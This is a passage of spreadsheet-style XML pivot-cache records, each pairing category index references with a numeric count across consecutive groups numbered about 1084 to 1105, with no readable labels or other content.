    <x v="3"/>
    <x v="11"/>
    <n v="57"/>
    <x v="1084"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1084"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1084"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1085"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1085"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1085"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1085"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1085"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="1085"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="35"/>
    <x v="1085"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="18"/>
    <x v="1085"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1085"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1085"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1085"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1085"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1085"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1085"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="1086"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1086"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="5"/>
    <x v="1086"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1086"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="8"/>
    <x v="1086"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1086"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1086"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1086"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1086"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1086"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="1086"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1086"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1086"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1086"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1087"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1087"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1087"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1087"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="9"/>
    <x v="1087"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="41"/>
    <x v="1087"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="9"/>
    <x v="1087"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="1087"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1087"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1087"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="210"/>
    <x v="1087"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="367"/>
    <x v="1087"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1087"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1087"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1088"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1088"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1088"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1088"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1088"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1088"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1088"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1088"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1088"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1088"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1088"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1088"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1088"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1088"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1089"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1089"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1089"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1089"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1089"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1089"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1089"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1089"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1089"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1089"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="1089"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1089"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1089"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1089"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1090"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1090"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1090"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1090"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1090"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1090"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="9"/>
    <x v="1090"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1090"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1090"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1090"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1090"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1090"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1090"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1090"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1091"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1091"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1091"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1091"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="31"/>
    <x v="1091"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="21"/>
    <x v="1091"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="12"/>
    <x v="1091"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="27"/>
    <x v="1091"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1091"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="7"/>
    <x v="1091"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="37"/>
    <x v="1091"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="212"/>
    <x v="1091"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1091"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1091"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1092"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1092"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1092"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1092"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1092"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1092"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="17"/>
    <x v="1092"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="10"/>
    <x v="1092"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1092"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1092"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1092"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1092"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1092"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1092"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1093"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1093"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1093"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1093"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1093"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1093"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1093"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1093"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1093"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1093"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1093"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="1093"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1093"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1093"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1094"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1094"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1094"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1094"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1094"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1094"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1094"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1094"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1094"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1094"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="1094"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1094"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1094"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1094"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="728"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1095"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1095"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1095"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1095"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1095"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1095"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1095"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1095"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1095"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1095"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1095"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1095"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1095"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="1095"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1096"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1096"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1096"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1096"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1096"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1096"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1096"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1096"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="1096"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="1096"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1096"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1096"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1096"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1096"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1097"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1097"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1097"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1097"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1097"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1097"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1097"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1097"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1097"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1097"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1097"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1097"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1097"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="20"/>
    <x v="1097"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1096"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1096"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1096"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1096"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1098"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1098"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1098"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1098"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1098"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1098"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1098"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1098"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1098"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1098"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1098"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1098"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1098"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="5"/>
    <x v="1098"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1099"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1099"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1099"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1099"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1099"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1099"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1099"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1099"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1099"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1099"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1099"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="1099"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1099"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="5"/>
    <x v="1099"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1100"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1100"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1100"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1100"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1100"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1100"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1100"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1100"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1100"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1100"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="12"/>
    <x v="1100"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1100"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1100"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1100"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1101"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1101"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1101"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1101"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="9"/>
    <x v="1101"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="1101"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1101"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1101"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1101"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1101"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="1101"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="50"/>
    <x v="1101"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1101"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1101"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1102"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1102"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1102"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1102"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1102"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1102"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1102"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1102"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1102"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1102"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1102"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="38"/>
    <x v="1102"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="1"/>
    <x v="1102"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1102"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1103"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1103"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1103"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1103"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1103"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1103"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1103"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1103"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1103"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1103"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1103"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1103"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1103"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1103"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1103"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1103"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="4"/>
    <x v="1103"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1104"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1104"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1104"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1104"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="1104"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="1104"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1104"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="10"/>
    <x v="1104"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1104"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1104"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="29"/>
    <x v="1104"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="70"/>
    <x v="1104"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1104"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1104"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1105"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1105"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1105"/>
  </r>
  <r>
